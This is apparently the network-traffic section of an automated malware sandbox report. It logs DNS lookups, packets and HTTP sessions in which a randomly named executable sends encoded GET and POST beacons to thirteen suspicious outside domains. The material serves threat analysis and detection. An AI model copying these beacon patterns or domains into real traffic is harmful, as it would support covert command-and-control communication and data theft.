                                                                              Jan 11, 2025 09:30:36.687844038 CET5002280192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:36.692517996 CET8050022108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:36.692559958 CET8050022108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:36.692663908 CET5002280192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:36.779689074 CET8050022108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:36.779714108 CET8050022108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:36.780994892 CET5002280192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:37.518243074 CET5002280192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.130939007 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.135792017 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.138762951 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.150762081 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.155545950 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781557083 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781579018 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781601906 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781615019 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781627893 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781629086 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.781667948 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.781780005 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781790972 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781802893 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781810045 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.781816006 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781827927 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.781833887 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.781861067 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.786432981 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.786443949 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.786571980 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:39.870033979 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.870053053 CET8050023108.179.253.197192.168.2.8
                                                                              Jan 11, 2025 09:30:39.870204926 CET5002380192.168.2.8108.179.253.197
                                                                              Jan 11, 2025 09:30:40.658911943 CET5002380192.168.2.8108.179.253.197

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 11, 2025 09:27:08.124028921 CET5440953192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:27:08.148448944 CET53544091.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:27:23.834701061 CET5236653192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:27:23.858900070 CET53523661.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:27:37.381458998 CET4937353192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:27:37.682338953 CET53493731.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:27:50.974895000 CET6344553192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:27:50.999321938 CET53634451.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:28:04.272236109 CET5650753192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:28:05.268244028 CET5650753192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:28:05.405982971 CET53565071.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:28:05.405992031 CET53565071.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:28:19.022715092 CET6215953192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:28:19.046083927 CET53621591.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:28:32.413129091 CET6207853192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:28:32.936409950 CET53620781.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:28:46.568720102 CET5987053192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:28:46.584135056 CET53598701.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:29:38.804008007 CET4969453192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:29:38.815242052 CET53496941.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:29:54.990899086 CET6193753192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:29:55.001682997 CET53619371.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:30:08.412636995 CET5478053192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:30:08.426120996 CET53547801.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:30:21.882054090 CET5761453192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:30:22.272552013 CET53576141.1.1.1192.168.2.8
                                                                              Jan 11, 2025 09:30:35.670994043 CET6378553192.168.2.81.1.1.1
                                                                              Jan 11, 2025 09:30:35.985554934 CET53637851.1.1.1192.168.2.8

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 11, 2025 09:27:08.124028921 CET192.168.2.81.1.1.10x9df5Standard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:23.834701061 CET192.168.2.81.1.1.10xca43Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:37.381458998 CET192.168.2.81.1.1.10xbbf6Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:50.974895000 CET192.168.2.81.1.1.10x6789Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:04.272236109 CET192.168.2.81.1.1.10x69ecStandard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.268244028 CET192.168.2.81.1.1.10x69ecStandard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:19.022715092 CET192.168.2.81.1.1.10xac83Standard query (0)www.logidant.xyzA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.413129091 CET192.168.2.81.1.1.10x817dStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:46.568720102 CET192.168.2.81.1.1.10x34fcStandard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:29:38.804008007 CET192.168.2.81.1.1.10xcde2Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:29:54.990899086 CET192.168.2.81.1.1.10x853fStandard query (0)www.brightvision.websiteA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:08.412636995 CET192.168.2.81.1.1.10x4ee9Standard query (0)www.airrelax.shopA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:21.882054090 CET192.168.2.81.1.1.10xc434Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:35.670994043 CET192.168.2.81.1.1.10x30afStandard query (0)www.bloodbalancecaps.shopA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 11, 2025 09:27:08.148448944 CET1.1.1.1192.168.2.80x9df5No error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:08.148448944 CET1.1.1.1192.168.2.80x9df5No error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:23.858900070 CET1.1.1.1192.168.2.80xca43No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:23.858900070 CET1.1.1.1192.168.2.80xca43No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:37.682338953 CET1.1.1.1192.168.2.80xbbf6No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:27:50.999321938 CET1.1.1.1192.168.2.80x6789No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405982971 CET1.1.1.1192.168.2.80x69ecNo error (0)www.yunlekeji.topwww-yunlekeji-top.lo0.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405982971 CET1.1.1.1192.168.2.80x69ecNo error (0)www-yunlekeji-top.lo0.faipod.comfap-a13f5c64.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405982971 CET1.1.1.1192.168.2.80x69ecNo error (0)fap-a13f5c64.faipod.com165.154.96.210A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405992031 CET1.1.1.1192.168.2.80x69ecNo error (0)www.yunlekeji.topwww-yunlekeji-top.lo0.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405992031 CET1.1.1.1192.168.2.80x69ecNo error (0)www-yunlekeji-top.lo0.faipod.comfap-a13f5c64.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:05.405992031 CET1.1.1.1192.168.2.80x69ecNo error (0)fap-a13f5c64.faipod.com165.154.96.210A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:19.046083927 CET1.1.1.1192.168.2.80xac83No error (0)www.logidant.xyzlogidant.xyzCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:19.046083927 CET1.1.1.1192.168.2.80xac83No error (0)logidant.xyz45.141.156.114A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.936409950 CET1.1.1.1192.168.2.80x817dNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.936409950 CET1.1.1.1192.168.2.80x817dNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.936409950 CET1.1.1.1192.168.2.80x817dNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.936409950 CET1.1.1.1192.168.2.80x817dNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:32.936409950 CET1.1.1.1192.168.2.80x817dNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:46.584135056 CET1.1.1.1192.168.2.80x34fcNo error (0)www.zkdamdjj.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:28:46.584135056 CET1.1.1.1192.168.2.80x34fcNo error (0)www.zkdamdjj.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:29:38.815242052 CET1.1.1.1192.168.2.80xcde2No error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:29:38.815242052 CET1.1.1.1192.168.2.80xcde2No error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:29:55.001682997 CET1.1.1.1192.168.2.80x853fNo error (0)www.brightvision.website203.161.42.73A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:08.426120996 CET1.1.1.1192.168.2.80x4ee9No error (0)www.airrelax.shop172.67.215.235A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:08.426120996 CET1.1.1.1192.168.2.80x4ee9No error (0)www.airrelax.shop104.21.16.206A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:22.272552013 CET1.1.1.1192.168.2.80xc434No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:22.272552013 CET1.1.1.1192.168.2.80xc434No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:35.985554934 CET1.1.1.1192.168.2.80x30afNo error (0)www.bloodbalancecaps.shopbloodbalancecaps.shopCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 11, 2025 09:30:35.985554934 CET1.1.1.1192.168.2.80x30afNo error (0)bloodbalancecaps.shop108.179.253.197A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • www.izmirescortg.xyz
                                                                              • www.aballanet.cat
                                                                              • www.madhf.tech
                                                                              • www.canadavinreport.site
                                                                              • www.yunlekeji.top
                                                                              • www.logidant.xyz
                                                                              • www.laohub10.net
                                                                              • www.zkdamdjj.shop
                                                                              • www.tals.xyz
                                                                              • www.brightvision.website
                                                                              • www.airrelax.shop
                                                                              • www.cstrategy.online
                                                                              • www.bloodbalancecaps.shop

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.849708172.67.186.192803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:08.169532061 CET380OUTGET /lnl7/?m8=urJ0WtmP0FPTTB&DzLTc=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA== HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Connection: close
                                                                              Host: www.izmirescortg.xyz
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Jan 11, 2025 09:27:08.792464018 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:08 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kVYvWshS%2FLMXhL30KcqVpG4p9%2FSKLE16xMIFoVsN5EjpAGarcV8DF56pCpmAErBIxKRqShDACSqdOIlXT8xKs9fKn9XvuNNXLTjxCceyf7SaXaOmPVN3aPVOGyQIXKec%2BkSid8GPlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 900386a28e937ce7-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=380&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                                                              Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div styl
                                                                              Jan 11, 2025 09:27:08.792495966 CET882INData Raw: 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33
                                                                              Data Ascii: e="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Fou


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.849709134.0.14.158803920C:\Program Files (x86)\PbKcVySxKkBqlnbtyVEUTzIwhSrPWuVYjgrhZNpAbtlDnEoRwvsHoWRxySkVwr\WafZCahkNS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 11, 2025 09:27:23.882349968 CET634OUTPOST /6xrr/ HTTP/1.1
                                                                              Accept: */*
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Content-Length: 206
                                                                              Connection: close
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Cache-Control: max-age=0
                                                                              Host: www.aballanet.cat
                                                                              Origin: http://www.aballanet.cat
                                                                              Referer: http://www.aballanet.cat/6xrr/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                                              Data Raw: 44 7a 4c 54 63 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 41 69 62 59 58 4b 50 50 69 6d 58 72 30 44 4f 58 67 33 41 54 44 6f 45 6d 77 52 75 59 30 47 75 6d 38 2b 61 71 47 59 3d
                                                                              Data Ascii: DzLTc=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4AibYXKPPimXr0DOXg3ATDoEmwRuY0Gum8+aqGY=
                                                                              Jan 11, 2025 09:27:24.773608923 CET1236INHTTP/1.1 404 Not Found
                                                                              Date: Sat, 11 Jan 2025 08:27:24 GMT
                                                                              Server: Apache
                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                              Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                                              Upgrade: h2,h2c
                                                                              Connection: Upgrade, close
                                                                              Transfer-Encoding: chunked
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                                              Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                                              Jan 11, 2025 09:27:24.773621082 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                                              Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                                              Jan 11, 2025 09:27:24.773781061 CET448INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                                              Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                                              Jan 11, 2025 09:27:24.773788929 CET1236INData Raw: 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33
                                                                              Data Ascii: {e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageDa
                                                                              Jan 11, 2025 09:27:24.773801088 CET1236INData Raw: 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69
                                                                              Data Ascii: peof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
                                                                              Jan 11, 2025 09:27:24.773806095 CET276INData Raw: 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72
                                                                              Data Ascii: {n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemoji
                                                                              Jan 11, 2025 09:27:24.773818016 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                                              Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                                              Jan 11, 2025 09:27:24.773930073 CET224INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                                              Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href=
                                                                              Jan 11, 2025 09:27:24.773936987 CET1236INData Raw: 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 67 6f 72 69 2d 70 64 66 2d 76 69 65 77 65 72 2f 64 69 73 74 2f 62 6c 6f 63 6b 73 2e 73 74 79 6c 65 2e 62 75 69 6c 64
                                                                              Data Ascii: 'http://aballanet.cat/wp-content/plugins/algori-pdf-viewer/dist/blocks.style.build.css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background
